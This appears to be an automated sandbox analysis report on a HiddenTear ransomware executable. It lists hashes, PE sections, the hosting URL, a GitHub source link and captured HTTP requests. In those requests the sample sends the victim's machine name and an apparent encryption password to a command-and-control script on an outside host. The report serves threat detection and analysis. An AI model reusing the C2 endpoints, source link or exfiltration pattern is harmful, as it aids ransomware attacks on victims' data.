MalScore
100/100

HiddenTear.exe

Is DLL Packer Anti Debug Anti VM Signed XOR AntiVirus 50/70 Related 2697
File details Download PDF Report
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
File size: 556.00 KB (569344 bytes)
Compile time: 2017-02-10 12:00:41
MD5: 4a8228f5109bc509936eb5286d86322a
SHA1: 36f1b50c1df1249e816944d0288604336d2b7a1e
SHA256: 721ccbb780b308c6c40817749b6764ad06cd2e56389bba1618a0dadc362d6429
Import hash: f34d5f2d4577ed6d9ceec516c1f5a744
Sections 3 .text .rsrc .reloc
Directories 4 import resource debug relocation
First submission: 2018-12-26 07:45:09
Last submission: 2018-12-26 07:45:09
Filename detected: - HiddenTear.exe (1)
URL file hosting
hXXp://apolo-ro.servidorturbo.net/tear/HiddenTear.exeVirusTotal
Antivirus Report
Report Date Detection Ratio Permalink Update
2018-12-21 20:20:48 [50/70] VirusTotal
PE Sections 1 suspicious
Name VAddress VSize Size MD5 SHA1
.text 0x2000 0x7177c 464896 740d9c18f2b49547f38ede4fd38c6495 4c37848cb49c908990ca89bd7ff5fcff74fdab4e
.rsrc 0x74000 0x19354 103424 82eaabc7f40bc2a40135415bc075f297 38995275f944e9d63bec57f77f5b573e22801070
.reloc 0x8e000 0xc 512 d69ed4a7513a5cb8c8be82a9299a5198 d134004cbb87887886ac7f31ef0187c76256481e
Meta Info
No Meta found in this file
XOR
No XOR informations found in this file.
Signature
This file isn't digitally signed
Packer(s)
No packers found for this file
File found
FIle type: Library
mscoree.dll
IP Found
No IP detected
URL(s)
https://github.com/SneakSensed/HiddenTear
http://apolo-ro.servidorturbo.net/tear/write.php?info=
http://www.websitetest.com/
http://www.w3.org/2001/XMLSchema-instance
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven05_64 Seven05_64 VirtualBox 2018-12-26 07:40:36 2018-12-26 07:43:37 181

6 Behaviors detected by system signatures

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven05_64 Seven05_64 VirtualBox 2018-12-26 07:40:36 2018-12-26 07:43:37 181

0 Summary items with data

Files

Nothing to display

Read Files

Nothing to display

Write Files

Nothing to display

Delete Files

Nothing to display

Keys

Nothing to display

Read Keys

Nothing to display

Write Keys

Nothing to display

Delete Keys

Nothing to display

Mutexes

Resolved APIs

Nothing to display

Execute Commands

Nothing to display

Started Services

Nothing to display

Created Services

Nothing to display
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven05_64 Seven05_64 VirtualBox 2018-12-26 07:40:36 2018-12-26 07:43:37 181

5 HTTP Request(s) detected

http://www.websitetest.com/
  • Hostname: www.websitetest.com
  • IP Address: 204.2.133.220
  • Port: 80
  • Count: 1

GET / HTTP/1.1
Host: www.websitetest.com
Connection: Keep-Alive

http://apolo-ro.servidorturbo.net/tear/write.php?info=SEVEN05-PC-Seven01%20:%20File%20opened!
  • Hostname: apolo-ro.servidorturbo.net
  • IP Address: 10.1.26.180
  • Port: 80
  • Count: 1

GET /tear/write.php?info=SEVEN05-PC-Seven01%20:%20File%20opened! HTTP/1.1
Accept: */*
Accept-Language: it
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: apolo-ro.servidorturbo.net
Connection: Keep-Alive

http://apolo-ro.servidorturbo.net/tear/write.php?info=SEVEN05-PC-Seven01%20:%20password%20is%20:%20&6T6cNhQ
  • Hostname: apolo-ro.servidorturbo.net
  • IP Address: 10.1.26.180
  • Port: 80
  • Count: 1

GET /tear/write.php?info=SEVEN05-PC-Seven01%20:%20password%20is%20:%20&6T6cNhQ HTTP/1.1
Accept: */*
Accept-Language: it
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: apolo-ro.servidorturbo.net
Connection: Keep-Alive

http://apolo-ro.servidorturbo.net/tear/write.php?info=SEVEN05-PC-Seven01%20:%20Sequence%20started!
  • Hostname: apolo-ro.servidorturbo.net
  • IP Address: 10.1.26.180
  • Port: 80
  • Count: 1

GET /tear/write.php?info=SEVEN05-PC-Seven01%20:%20Sequence%20started! HTTP/1.1
Accept: */*
Accept-Language: it
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: apolo-ro.servidorturbo.net
Connection: Keep-Alive

http://apolo-ro.servidorturbo.net/tear/write.php?info=SEVEN05-PC-Seven01%20:%20Persisted,%20starting%20encryption!
  • Hostname: apolo-ro.servidorturbo.net
  • IP Address: 10.1.26.180
  • Port: 80
  • Count: 1

GET /tear/write.php?info=SEVEN05-PC-Seven01%20:%20Persisted,%20starting%20encryption! HTTP/1.1
Accept: */*
Accept-Language: it
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: apolo-ro.servidorturbo.net
Connection: Keep-Alive

#infosec #automation

TheSystem Itself @ 2018-12-26 07:45:11